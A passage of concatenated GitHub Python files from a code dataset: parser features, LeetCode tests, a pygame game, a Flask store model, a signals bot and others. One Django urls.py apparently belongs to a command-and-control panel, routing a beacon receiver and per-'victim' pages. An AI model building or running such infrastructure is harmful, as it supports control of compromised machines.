Shortest Path Faster.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34391719160","text":"\"\"\"\nUnigram:\nhform, hpos hform, hpos, dform, dpos hpos, bpos, dpos\nhform hpos, dform, dpos hpos, dpos, hpos+1, dpos-1\nhpos hform, dform, dpos hpos, dpos, hpos-1, dpos-1\ndform, dpos hform, hpos, dform hpos, dpos, hpos+1, dpos+1\ndform hform, hpos, dpos hpos, dpos, hpos-1, dpos+1\ndpos hform, dform\n hpos, dpos\n\"\"\"\nimport os\nfrom itertools import combinations\nfrom tqdm import tqdm\n\nfrom src.tools.CONLL06 import Token, Sentence, TreeBank\n\nHEAD = \"HEAD\"\nDEPE = \"DEPE\"\n\nFORM = \"FORM\"\nPOS = \"POS\"\n\nHEAD_FORM = f\"{HEAD}_{FORM}\"\nHEAD_POS = f\"{HEAD}_{POS}\"\nDEPE_FORM = f\"{DEPE}_{FORM}\"\nDEPE_POS = f\"{DEPE}_{POS}\"\n\nBASIC_FEATURES = (HEAD_FORM, HEAD_POS, DEPE_FORM, DEPE_POS)\n\nBETW = \"BETW\"\nNEXT = \"NEXT\"\nPREV = \"PREV\"\n\nBETW_POS = f\"{BETW}_{POS}\"\nHEAD_POS_NEXT = f\"{HEAD}_{POS}_{NEXT}\"\nHEAD_POS_PREV = f\"{HEAD}_{POS}_{PREV}\"\nDEPE_POS_NEXT = f\"{DEPE}_{POS}_{NEXT}\"\nDEPE_POS_PREV = f\"{DEPE}_{POS}_{PREV}\"\n\n\nclass TemplateWizard:\n    @staticmethod\n    def basic_templates():\n        \"\"\"\n        generates all combinations with length 1 to 4 of features\n        \"\"\"\n        grams = []\n        for n in range(1, 5):\n            for combination in combinations(BASIC_FEATURES, n):\n                grams.append(combination)\n        return tuple(grams)\n\n    @staticmethod\n    def extended_templates():\n        return (\n            (HEAD_POS, BETW_POS, DEPE_POS),\n            (HEAD_POS, DEPE_POS, HEAD_POS_NEXT, DEPE_POS_NEXT),\n            (HEAD_POS, DEPE_POS, HEAD_POS_PREV, DEPE_POS_NEXT),\n            (HEAD_POS, DEPE_POS, HEAD_POS_NEXT, DEPE_POS_PREV),\n            (HEAD_POS, DEPE_POS, HEAD_POS_PREV, DEPE_POS_PREV)\n        )\n\n    TEMPLATES = basic_templates() + extended_templates()\n\n    @staticmethod\n    def get_feature_keys(head: Token | int, dependant: Token | int, sentence: Sentence) -> list[str]:\n        \"\"\"\n        returns feature keys for an edge.\n        Example:\n        [\"HEAD_FORM_<I>,\", \"HEAD_POS_<PP>,\", ...\n        \"DEPE_FORM_<cats>,DEPE_POS_<NN>,\", ...\n        ]\n        \"\"\"\n        if not isinstance(head, Token):\n            head = sentence.get_token_or_none_token(head)\n        if not isinstance(dependant, Token):\n            dependant = sentence.get_token_or_none_token(dependant)\n        keys = []\n        for template in TemplateWizard.TEMPLATES:\n            key = f\"|{max(min(head.id_ - dependant.id_, + 5), -5)}|_\"\n            for feature in template:\n                token = TemplateWizard._get_relevant_token(feature, head, dependant, sentence)\n                if FORM in feature:\n                    key += f\"{feature}_<{token.form}>,\"\n                elif POS in feature:\n                    key += f\"{feature}_<{token.pos}>,\"\n            keys.append(key)\n        return keys\n\n    @staticmethod\n    def _get_relevant_token(feature, head: Token, dependent: Token, sentence: Sentence) -> Token:\n        if DEPE in feature:\n            relevant_token = dependent\n        elif HEAD in feature:\n            relevant_token = head\n        else:  # BETW\n            betw_id = (head.id_ + dependent.id_) / 2\n            if abs(head.id_ - betw_id) == 1:\n                relevant_token = sentence.get_token_or_none_token(int(betw_id))\n            else:\n                relevant_token = Token.create_none()\n        if NEXT in feature:\n            relevant_token = sentence.get_token_or_none_token(relevant_token.id_ + 1)\n        if PREV in feature:\n            relevant_token = sentence.get_token_or_none_token(relevant_token.id_ - 1)\n        return relevant_token\n\n    @staticmethod\n    def create_feature_dict(tree_bank: TreeBank, path: str) -> dict[str, int]:\n        if os.path.isfile(path):\n            print(f\"Found dict at given path, loading from file...\")\n            return TemplateWizard.load_dict(path)\n        print(f\"Creating new feature 
dict from tree bank, this might take a while...\")\n feature_dict = {}\n index = 0\n for sentence in tqdm(tree_bank):\n tree = sentence.to_tree()\n for token in sentence:\n for dependent in tree.get_dependent_ids(token.id_):\n feature_keys = TemplateWizard.get_feature_keys(token, dependent, sentence)\n for feature_key in feature_keys:\n if feature_key not in feature_dict:\n feature_dict[feature_key] = index\n index += 1\n TemplateWizard.save_dict(feature_dict, path)\n return feature_dict\n\n @staticmethod\n def save_dict(feature_dict: dict, path: str):\n with open(path, 'w', encoding=\"utf-8\") as f_out:\n for key, value in feature_dict.items():\n f_out.write(f\"{key}\\t{value}\\n\")\n\n @staticmethod\n def load_dict(path: str) -> dict[str, int]:\n feature_dict = {}\n with open(path, 'r', encoding=\"utf-8\") as f_in:\n for line in f_in.readlines():\n key, value = line.strip().split(\"\\t\")\n feature_dict[key] = int(value)\n return feature_dict\n","repo_name":"JensKaiser96/StatisticalDependencyParsing","sub_path":"src/features/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41878712856","text":"from unittest import TestCase\n\nfrom leetcodepy.minimum_window_substring import *\n\nSOLUTION1 = Solution1()\n\nS1 = \"ADOBECODEBANC\"\nT1 = \"ABC\"\nEXPECTED1 = \"BANC\"\n\nS2 = \"a\"\nT2 = \"a\"\nEXPECTED2 = \"a\"\n\nS3 = \"a\"\nT3 = \"aa\"\nEXPECTED3 = \"\"\n\n\nclass TestMinimumWindowSubstring(TestCase):\n def test1(self):\n self.assertEqual(EXPECTED1, SOLUTION1.minWindow(S1, T1))\n self.assertEqual(EXPECTED2, SOLUTION1.minWindow(S2, T2))\n self.assertEqual(EXPECTED3, SOLUTION1.minWindow(S3, T3))\n","repo_name":"qianbinbin/leetcode","sub_path":"python3/tests/test_minimum_window_substring.py","file_name":"test_minimum_window_substring.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"20280579114","text":"def linear_search(l, target):\n \"\"\"\n Returns the index position of the target if found, else returns None\n \"\"\"\n for i in range(0, len(l)):\n if l[i]==target:\n return i\n return None\n\ndef verify(index):\n if index is not None:\n print(f\"Target found at index: {index}\")\n else:\n print(\"Target not found in list.\")\n\n# Execution\nif __name__ == \"__main__\":\n # Input values\n target = 8\n list_length = 10\n\n # Algo\n numbers = [x for x in range(1, list_length+1)]\n result = linear_search(numbers, target)\n verify(result)","repo_name":"LucasLaLima/algorithms-data-structures","sub_path":"linear_search.py","file_name":"linear_search.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34892737129","text":"import pygame\nimport random\n\npygame.init()\nfrom setup import *\nfrom character import *\nfrom environment import *\nfrom obstacle import *\n\n\ndef main():\n global game_speed, points, obstacles\n run = True\n clock = pygame.time.Clock()\n player = Character()\n game_speed = 18\n points = 0\n obstacles = []\n death_count = 0\n\n def score():\n global points, game_speed\n points += 1\n if points % 100 == 0:\n game_speed += 1\n\n text = font.render(\"Points: \" + str(points), True, (0, 0, 0))\n textRect = text.get_rect()\n textRect.center = (1200, 40)\n SCREEN.blit(text, textRect)\n\n backgrounds = AllBackgrounds(game_speed)\n\n while 
run:\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                run = False\n\n        SCREEN.fill((255, 255, 255))\n        userInput = pygame.key.get_pressed()\n\n        backgrounds.draw()\n        backgrounds.update()\n\n        player.draw(SCREEN)\n        player.update(userInput)\n\n        if len(obstacles) == 0:\n            obstacle_choice = random.randint(0, 2)\n            if obstacle_choice == 0:\n                obstacles.append(SmallCactus(CACTUS_1))\n            elif obstacle_choice == 1:\n                obstacles.append(LargeCactus(CACTUS_2))\n            elif obstacle_choice == 2:\n                obstacles.append(Bird(BIRD))\n\n        for obstacle in obstacles:\n            obstacle.draw(SCREEN)\n            obstacle.update(game_speed, obstacles)\n            if player.character_rect.colliderect(obstacle.rect):\n                pygame.time.delay(1000)\n                death_count += 1\n                menu(death_count)\n        # pygame.draw.rect(SCREEN, (255, 0, 0), player.character_rect, 2)\n\n        score()\n\n        clock.tick(30)\n        pygame.display.update()\n\n\ndef menu(death_count):\n    global points\n    run = True\n    while run:\n        SCREEN.fill((255, 255, 255))\n        font = pygame.font.Font('freesansbold.ttf', 30)\n\n        if death_count == 0:\n            text = font.render(\"Press any Key to Start\", True, (0, 0, 0))\n        elif death_count > 0:\n            text = font.render(\"Press any Key to Restart\", True, (0, 0, 0))\n            score = font.render(\"Your Score: \" + str(points), True, (0, 0, 0))\n            scoreRect = score.get_rect()\n            scoreRect.center = (SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2 + 50)\n            SCREEN.blit(score, scoreRect)\n        textRect = text.get_rect()\n        textRect.center = (SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2)\n        SCREEN.blit(text, textRect)\n        SCREEN.blit(RUNNING[0], (SCREEN_WIDTH // 2 - 90, SCREEN_HEIGHT // 2 - 180))\n        pygame.display.update()\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                run = False\n            if event.type == pygame.KEYDOWN:\n                main()\n\n\nmenu(death_count=0)\n","repo_name":"dimasnoufal/2dRunGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34563873869","text":"from django.urls import path,re_path,include\nfrom django.http import HttpResponseRedirect\n\nfrom . 
import views\n\napp_name = 'candela'\nurlpatterns = [\n re_path(r'^$', lambda r: HttpResponseRedirect('victims/')),\n path('beacon/', views.receive_beacon, name='receive_beacon'),\n path('victims/', include([\n path('', views.victims_index, name='victims_index'),\n path('list/', views.list_victims, name='list_victims'),\n path('<int:id>/', include([\n path('', views.victim_details, name='victim_details'),\n path('sent/', views.list_sent, name='victim_sent'),\n path('stack/', views.list_stack, name='victim_stack'),\n ])),\n ])),\n]\n","repo_name":"norrell/candela","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39300307506","text":"import string\n\nfrom ucca import layer0, layer1\nfrom ucca.layer0 import NodeTags as L0Tags\nfrom ucca.layer1 import EdgeTags as ETags, NodeTags as L1Tags\n\nLINKAGE = (ETags.LinkArgument, ETags.LinkRelation)\n\n\ndef validate(passage, linkage=True):\n for node in passage.layer(layer0.LAYER_ID).all:\n yield from NodeValidator(node).validate_terminal()\n heads = list(passage.layer(layer1.LAYER_ID).heads)\n found_linkage = False\n for node in heads:\n if node.tag == L1Tags.Linkage:\n found_linkage = True\n yield from NodeValidator(node).validate_top_level()\n stack = [heads]\n visited = set()\n path = []\n path_set = set(path)\n while stack:\n for node in stack[-1]:\n if node in path_set:\n yield \"Detected cycle (%s)\" % \"->\".join(n.ID for n in path)\n elif node not in visited:\n visited.add(node)\n path.append(node)\n path_set.add(node)\n stack.append(node.children)\n yield from NodeValidator(node).validate_non_terminal(linkage=linkage and found_linkage)\n break\n else:\n if path:\n path_set.remove(path.pop())\n stack.pop()\n\n\nclass NodeValidator:\n def __init__(self, node):\n self.node = node\n self.incoming = tag_to_edge(node.incoming)\n self.outgoing = tag_to_edge(node)\n self.incoming_tags = set(self.incoming)\n self.outgoing_tags = set(self.outgoing)\n\n def validate_terminal(self):\n if not self.node.text:\n yield \"Empty terminal text (%s)\" % self.node.ID\n if set(self.node.text).intersection(string.whitespace):\n yield \"Whitespace in terminal text (%s): '%s'\" % (self.node.ID, self.node)\n if not self.incoming:\n yield \"Orphan %s terminal (%s) '%s'\" % (self.node.tag, self.node.ID, self.node)\n elif len(self.node.incoming) > 1:\n yield \"Reentrant %s terminal (%s) '%s'\" % (self.node.tag, join(self.node.incoming), self.node)\n\n def validate_top_level(self):\n if self.node.ID != \"1.1\" and self.node.tag != L1Tags.Linkage:\n yield \"Extra root (%s)\" % self.node.ID\n terminals = [n for n in self.node.children if n.layer.ID == layer0.LAYER_ID]\n if terminals:\n yield \"Terminal children (%s) of root (%s)\" % (join(terminals), self.node)\n s = self.outgoing_tags.difference((ETags.ParallelScene, ETags.Linker, ETags.Function, ETags.Ground,\n ETags.Punctuation, ETags.LinkRelation, ETags.LinkArgument))\n if s:\n yield \"Top-level node (%s) with %s edge\" % (self.node.ID, join(s))\n\n def validate_non_terminal(self, linkage=False):\n if linkage and self.node.tag == L1Tags.Linkage:\n yield from self.validate_linkage()\n elif self.node.tag == L1Tags.Foundational:\n yield from self.validate_foundational()\n primary_incoming = [e for e in self.node.incoming if not e.attrib.get(\"remote\") and e.tag not in LINKAGE]\n if len(primary_incoming) > 1:\n yield \"Multiple incoming non-remote (%s)\" % 
join(primary_incoming)\n remote_incoming = [e for e in self.node.incoming if e.attrib.get(\"remote\")]\n if remote_incoming and not primary_incoming:\n yield \"Node (%s) with remote parents but no primary parents\" % self.node.ID\n for edge in self.node:\n if (edge.tag == ETags.Punctuation) != (edge.child.tag == L1Tags.Punctuation):\n yield \"%s edge (%s) with %s child\" % (edge.tag, edge, edge.child.tag)\n # FN parent of Punctuation is disallowed unless the FN is unanalyzable\n if (self.node.tag == L1Tags.Foundational) and (edge.child.tag == L0Tags.Punct) and \\\n not len(self.node.terminals) + len(self.node.punctuation) == len(self.node.children) > 1 or \\\n (self.node.tag == L1Tags.Punctuation) and not (edge.child.tag == L0Tags.Punct):\n yield \"%s node (%s) with %s child (%s)\" % (self.node.tag, self.node.ID, edge.child.tag, edge.child.ID)\n if self.node.attrib.get(\"implicit\"):\n if self.node.outgoing:\n yield \"Implicit node (%s) with outgoing edges (%s)\" % (self.node.ID, join(self.node))\n elif self.node.tag in (L1Tags.Foundational, L1Tags.Linkage, L1Tags.Punctuation) and \\\n all(e.attrib.get(\"remote\") for e in self.node):\n yield \"Non-implicit node (%s) with no primary children\" % (self.node.ID)\n for tag in (ETags.Function, ETags.ParallelScene, ETags.Linker, ETags.LinkRelation,\n ETags.Connector, ETags.Punctuation, ETags.Terminal):\n s = self.incoming.get(tag, ())\n if len(s) > 1:\n yield \"Multiple incoming %s edges (%s)\" % (tag, join(s))\n for tag in (ETags.LinkRelation, ETags.Process, ETags.State):\n s = self.outgoing.get(tag, ())\n if len(s) > 1:\n yield \"Multiple outgoing %s edges (%s)\" % (tag, join(s))\n if ETags.Function in self.incoming:\n s = self.outgoing_tags.difference((ETags.Terminal, ETags.Punctuation))\n if s:\n yield \"%s node (%s) with outgoing %s edge: %s\" % (ETags.Function, self.node.ID, join(s), self.node)\n if ETags.Linker in self.incoming_tags and linkage and ETags.LinkRelation not in self.incoming_tags:\n yield \"%s node (%s) with no incoming %s\" % (ETags.Linker, self.node.ID, ETags.LinkRelation)\n\n def validate_linkage(self):\n if self.node.incoming:\n yield \"Non-root %s node (%s)\" % (self.node.tag, self.node)\n s = self.outgoing_tags.difference(LINKAGE)\n if s:\n yield \"%s node (%s) with %s children\" % (self.node.tag, self.node, join(s))\n if ETags.LinkRelation not in self.outgoing:\n yield \"%s node without %s child\" % (self.node.tag, ETags.LinkRelation)\n\n def validate_foundational(self):\n if self.node.participants and not self.node.is_scene():\n yield \"Node (%s) with participants but without main relation: %s\" % (self.node.ID, self.node)\n if self.node.process and self.node.state:\n yield \"Node (%s) with both process (%s) and state (%s)\" % (self.node.ID, self.node.process, self.node.state)\n if self.node.parallel_scenes:\n s = self.outgoing_tags.difference((ETags.ParallelScene, ETags.Punctuation, ETags.Linker,\n ETags.Ground, ETags.Relator, ETags.Function))\n if s:\n yield \"Node (%s) with parallel scenes has %s edge\" % (self.node.ID, join(s))\n s = self.outgoing_tags.intersection(LINKAGE)\n if s:\n yield \"Non-linkage node (%s) with %s edges\" % (self.node, join(s))\n\n\ndef tag_to_edge(edges):\n d = {}\n for edge in edges:\n d.setdefault(edge.tag, []).append(edge)\n return d\n\n\ndef join(items):\n return \", \".join(map(str, 
items))\n","repo_name":"shachardon/ucca","sub_path":"ucca/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":7029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"11092243900","text":"from create_bot import bot\r\nfrom config import logger\r\nimport asyncio\r\nimport time\r\n\r\nfrom handlers.user import manager as user_manager\r\nfrom . import manager\r\n\r\nfrom typing import List, Tuple, Dict\r\nfrom entities.parsing.types import (\r\n\tParserResponse, Advertisement\r\n)\r\nfrom entities import (\r\n\tUser, Parametres, Signal\r\n)\r\n\r\n\r\n# Dict with the tuple of signals sent to a user\r\nsignals: Dict[int, Tuple[Signal]] = {}\r\n\r\n\r\n@logger.catch\r\nasync def server(wait_for: int):\r\n\t\"\"\"\r\n\tServer function that runs periodically to process signals for active users\r\n\r\n\tArgs:\r\n\t\twait_for (int): The time interval to wait between server pings\r\n\t\"\"\"\r\n\r\n\t# List of user IDs that have been notified about inefficient parameters\r\n\tnotified_users: List[int] = list()\r\n\tmin_acceptable_signals_amount = 5\r\n\r\n\tawait manager.set_fiats_symbols()\r\n\r\n\twhile True:\r\n\t\tawait asyncio.sleep(wait_for)\r\n\t\tlogger.success(\"Server ping\")\r\n\r\n\t\ttry:\r\n\t\t\tactive_users: List[User] = await user_manager.get_active_users()\r\n\t\t\tlogger.info(f\"Active users amount: {len(active_users)}\")\r\n\r\n\t\t\t# Check if notified users turned off the bot\r\n\t\t\tfor user_id in notified_users:\r\n\t\t\t\tif not user_id in [user.user_id for user in active_users]:\r\n\t\t\t\t\tnotified_users.remove(user_id)\r\n\r\n\t\t\tfor user in active_users:\r\n\t\t\t\tuser_id = user.user_id\r\n\r\n\t\t\t\tparametres: Parametres = await user_manager.get_user_parametres(user_id)\r\n\r\n\t\t\t\tif not parametres:\r\n\t\t\t\t\tlogger.error(f\"No parametres: {user_id}\")\r\n\t\t\t\t\tcontinue\r\n\r\n\t\t\t\ttotal_sent_signals = tuple()\r\n\t\t\t\tif signals.get(user_id):\r\n\t\t\t\t\tformer_signals = signals[user_id]\r\n\t\t\t\telse:\r\n\t\t\t\t\tformer_signals = tuple()\r\n\r\n\t\t\t\tfor currency in parametres.currencies.value:\r\n\t\t\t\t\tparsers_responses = await manager.gather_parsers_responses(\r\n\t\t\t\t\t\tcurrency, parametres\r\n\t\t\t\t\t)\r\n\r\n\t\t\t\t\tsent_signals: Tuple[Signal] = await manager.iterate_advertisments(\r\n\t\t\t\t\t\tuser_id, parametres, parsers_responses, former_signals\r\n\t\t\t\t\t)\r\n\t\t\t\t\ttotal_sent_signals += sent_signals\r\n\r\n\t\t\t\t# Notification about inefficient parametres\r\n\t\t\t\tif len(total_sent_signals) < min_acceptable_signals_amount and \\\r\n\t\t\t\t\t\t\t\t\tnot user_id in notified_users:\r\n\t\t\t\t\tawait manager.notificate_user(user_id)\r\n\t\t\t\t\tnotified_users.append(user_id)\r\n\r\n\t\t\t\tif total_sent_signals:\r\n\t\t\t\t\tsignals[user_id] = total_sent_signals\r\n\r\n\t\t\t\tlogger.info(f\"{user_id} | {user.username} Sent signals: {len(total_sent_signals)}\")\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tlogger.error(f\"Signals thread crashed: {e}\")\r\n\t\t\tcontinue\r\n","repo_name":"NikitaKostin1/SpreadCatcher","sub_path":"signals/thread.py","file_name":"thread.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69889731752","text":"# Author: Christian Brodbeck <christianbrodbeck@nyu.edu>\nfrom matplotlib.backend_bases import KeyEvent\nimport numpy as np\nimport pytest\nimport wx\n\nfrom eelbrain import datasets, plot, 
testnd\nfrom eelbrain._utils import IS_WINDOWS\nfrom eelbrain.testing import requires_mne_sample_data, hide_plots\nfrom eelbrain.testing.matplotlib import assert_titles_visible\n\n\n@hide_plots\ndef test_plot_topomap():\n \"Test plot.Topomap\"\n ds = datasets.simulate_erp(8, 0)\n ds['long'] = ds['n_chars'] > 4\n ds['topo'] = ds['eeg'].mean(time=(0.300, 0.500))\n\n p = plot.Topomap('topo', data=ds)\n # contours\n p.add_contour(0, '0', 'V')\n p.add_contour(0.5e-6, '#00FF00', 'V')\n # colormap with limits\n assert p.get_vlim() == (-2e-06, 2e-06)\n cmap = plot.soft_threshold_colormap('jet', 1e-6, 4e-6, symmetric=True)\n p.set_cmap(cmap)\n assert p.get_vlim() == (-4e-06, 4e-06)\n p.close()\n\n p = plot.Topomap('topo', data=ds, vmax=0.5e-6, w=2)\n p.close()\n p = plot.Topomap('topo', 'predictability', data=ds, axw=2)\n assert_titles_visible(p)\n p.close()\n p = plot.Topomap('topo', 'predictability % long', data=ds, axw=2, ncol=2)\n assert_titles_visible(p)\n p.close()\n p = plot.Topomap('topo', 'predictability % long', data=ds, axw=2, ncol=2, title='Topomap Plot Title')\n assert_titles_visible(p)\n p.close()\n\n # axtitles from array\n index = np.array([1, 3, 2])\n p = plot.Topomap(ds[index, 'topo'], '.case', nrow=1, axh=2, h=2.4, axtitle=index)\n p.close()\n\n\n@requires_mne_sample_data\n@hide_plots\ndef test_plot_topomap_mne():\n \"Test plot.Topomap with MNE data\"\n ds = datasets.get_mne_sample(sub=[0, 1], sns=True)\n p = plot.Topomap(ds['meg'].summary(time=(.1, .12)), proj='left')\n p.close()\n # grad\n ds = datasets.get_mne_sample(sub=[0], sns='planar1')\n plot.Topomap('meg.sub(time=.1)', data=ds)\n\n\n@hide_plots\ndef test_plot_topo_butterfly():\n \"Test plot.TopoButterfly\"\n ds = datasets.get_uts(utsnd=True)\n\n # single row\n p = plot.TopoButterfly('utsnd', data=ds)\n p.set_time(0.2)\n # t keypress on topomap\n x, y = p.topo_axes[0].transAxes.transform((.5, .5))\n event = KeyEvent('test', p.canvas, 't', x, y, wx.KeyEvent())\n p._on_key_press(event)\n p.close()\n\n p = plot.TopoButterfly('utsnd', data=ds, vmax=2, w=6, t=0.5)\n assert p.axes[0].get_ylim() == (-2.0, 2.0)\n assert p._time_fixed\n p.close()\n\n # multiple rows\n p = plot.TopoButterfly('utsnd', 'A%B', data=ds, w=6)\n if not IS_WINDOWS:\n assert (*p.figure.get_size_inches(),) == (6, 12)\n # t keypress on topomaps\n for ax in p.topo_axes:\n x, y = ax.transAxes.transform((.5, .5))\n event = KeyEvent('test', p.canvas, 't', x, y, wx.KeyEvent())\n p._on_key_press(event)\n p.close()\n\n p = plot.TopoButterfly('utsnd', mark=[1, 2], data=ds)\n p.close()\n\n p = plot.TopoButterfly('utsnd', mark=['1', '2'], data=ds)\n p.set_vlim(2)\n assert p.get_vlim() == (-2.0, 2.0)\n p.set_ylim(-1, 1)\n assert p.get_ylim() == (-1.0, 1.0)\n p.close()\n\n\n@hide_plots\ndef test_plot_array():\n \"Test plot.TopoArray\"\n ds = datasets.get_uts(utsnd=True)\n p = plot.TopoArray('utsnd', data=ds)\n assert repr(p) == \"<TopoArray: utsnd>\"\n p.set_topo_t(0, 0.2)\n p.close()\n p = plot.TopoArray('utsnd', data=ds, vmax=0.2, w=2)\n p.close()\n p = plot.TopoArray('utsnd', 'A%B', data=ds, axw=4)\n assert repr(p) == \"<TopoArray: utsnd ~ A x B>\"\n p.close()\n\n # results\n res = testnd.TTestIndependent('utsnd', 'A', data=ds, pmin=0.05, tstart=0.1, tstop=0.3, samples=2)\n p = plot.TopoArray(res)\n assert repr(p) == \"<TopoArray: a0, a1, a0 - a1>\"\n p.set_topo_t(0, 0.)\n 
p.close()\n","repo_name":"christianbrodbeck/Eelbrain","sub_path":"eelbrain/plot/tests/test_topo.py","file_name":"test_topo.py","file_ext":"py","file_size_in_byte":3694,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"72"} +{"seq_id":"28013696788","text":"from math import factorial\n\nresult = 0\n\nfor i in range(3, 1000000):\n    j = str(i)\n    r = 0\n    for e in j:\n        e = int(e)\n        r += factorial(e)\n    if i == r:\n        print(i)\n        result += i\n\nprint(result)","repo_name":"ManusRH/ProjectEuler-Python","sub_path":"34.py","file_name":"34.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33013303888","text":"# Utility Function which finds the family assistance amount using some conditions\r\ndef familyAssistance():\r\n    # keep track of totalFamilyAssistance\r\n    # of all families\r\n    totalAmountOfAssistance=0\r\n    # run until the user exits\r\n    while True:\r\n        # input: income\r\n        income=int(input(\"Enter household income: \"))\r\n        # if -1 end program\r\n        if income==-1:\r\n            print(\"Exit..!!!\")\r\n            # print totalAssistance value for all families\r\n            print(f'The total 
amount of Assistance: {totalAmountOfAssistance}')\r\n            return\r\n        # children input\r\n        children=int(input(\"Enter number of children: \"))\r\n        # condition 1: if income is greater than 30000 and less than or equal to 40000\r\n        if income>30000 and income<=40000:\r\n            # if children greater than or equal to 3\r\n            if children>=3 :\r\n                # totalAssistance for this family children is\r\n                assistanceAmount=children*1000\r\n                # add this to our global totalAssistance\r\n                totalAmountOfAssistance=totalAmountOfAssistance+assistanceAmount\r\n                # Print amount of assistance\r\n                print(f'Amount of Assistance: {assistanceAmount}')\r\n        # Condition 2: if income is greater than 20000 and less than or equal to 30000\r\n        elif income>20000 and income<=30000:\r\n            # if family has greater than or equal to 2 children\r\n            if children>=2:\r\n                # totalAssistance for this family children is\r\n                assistanceAmount=children*1500\r\n                # add this to our global totalAssistance\r\n                totalAmountOfAssistance=totalAmountOfAssistance+assistanceAmount\r\n                # Print amount of assistance\r\n                print(f'Amount of Assistance: {assistanceAmount}')\r\n        # else if income is less than or equal to 20000\r\n        elif income<=20000:\r\n            # totalAssistance for this family children is\r\n            assistanceAmount=children*2000\r\n            # add this to our global totalAssistance\r\n            totalAmountOfAssistance=totalAmountOfAssistance+assistanceAmount\r\n            # Print amount of assistance\r\n            print(f'Amount of Assistance: {assistanceAmount}')\r\n        # else if income is greater than 40000\r\n        elif income>40000:\r\n            # assistance amount = 0\r\n            assistanceAmount=0\r\n            totalAmountOfAssistance=totalAmountOfAssistance+0\r\n            print(f'Amount of Assistance: {assistanceAmount}')\r\n    \r\n\r\nif __name__ == '__main__':\r\n    familyAssistance()\r\n    ","repo_name":"Nilesh1206/mission_faang","sub_path":"Chegg/77_Family.py","file_name":"77_Family.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"33161388479","text":"from flask_app import app\nfrom flask_app.config.mysqlconnection import connectToMySQL\nfrom flask import flash\nDB = \"tienda_virtual\"\n\nclass Producto:\n    def __init__(self,producto):\n        self.id = producto[\"id\"]\n        self.codigo = producto[\"codigo\"]\n        self.producto = producto[\"producto\"]\n        self.descripcion = producto[\"descripcion\"]\n        self.precio = producto[\"precio\"]\n        self.imagen = producto[\"imagen\"]\n    \n    @classmethod\n    def get_all(cls):\n        query = \"SELECT * from producto;\"\n        producto_data = connectToMySQL(DB).query_db(query)\n        productos = []\n        for producto in producto_data:\n            productos.append(cls(producto))\n        return productos\n    \n    @classmethod\n    def get_by_producto(cls,producto):\n        \n        data = {\"producto\":\"%%\"+producto+\"%%\"}\n        query = \"SELECT * FROM producto where producto like %(producto)s;\"\n\n        result = connectToMySQL(DB).query_db(query,data)\n\n        productos = []\n        for producto in result:\n            productos.append(cls(producto))\n        return productos\n\n    @classmethod\n    def get_by_id(cls, producto_id):\n\n        data = {\"id\": producto_id}\n        query = \"SELECT * FROM producto WHERE id = %(id)s;\"\n        result = connectToMySQL(DB).query_db(query,data)\n        productos = []\n        for producto in result:\n            productos.append(cls(producto))\n        return productos","repo_name":"JulioAR0800/PROYECTO_INDIVIDUAL","sub_path":"PROYECTO 
INDIVIDUAL/flask_app/models/producto.py","file_name":"producto.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25478740320","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport sys\n\ndef extract_probabilities(log_lines, skip_x_probs):\n probabilities = []\n epoch_indeces = []\n current_problem = \"\"\n prob_regex = r'was chosen with probability ([0-9]+\\.[0-9]*)'\n epoch_regex = r'Epoch (\\d+):'\n prob_counter = -1\n prob_index = 0\n for line in log_lines:\n match = re.search(prob_regex, line)\n if match:\n prob_counter += 1\n if prob_counter % skip_x_probs != 0:\n continue\n prob = float(match.group(1))\n probabilities.append((prob_index * skip_x_probs, prob))\n prob_index += 1\n continue\n\n match = re.match(epoch_regex, line)\n if match:\n epoch_indeces.append(prob_index)\n prob_index += 1\n return probabilities, epoch_indeces\n\n\ndef write_probability_graph(probabilities, epoch_indeces, tex_path):\n with open(tex_path, 'w') as f:\n f.write('\\\\begin{tikzpicture}[trim axis left]\\n')\n f.write('\\t\\\\begin{axis}[\\n')\n f.write('\\t\\tscale only axis,\\n')\n f.write('\\t\\theight=5cm,\\n')\n f.write('\\t\\twidth=\\\\textwidth,\\n')\n f.write('\\t\\tmax space between ticks=50,\\n')\n f.write('\\t\\tminor x tick num=4,\\n')\n f.write('\\t\\tminor y tick num=4,\\n')\n f.write('\\t\\ttick style={semithick,color=black},\\n')\n f.write('\\t\\txlabel=action $a$,\\n')\n f.write('\\t\\txticklabels={,,},\\n')\n f.write('\\t\\tylabel=$\\pi^\\\\theta(a \\\\mid s)$]\\n')\n 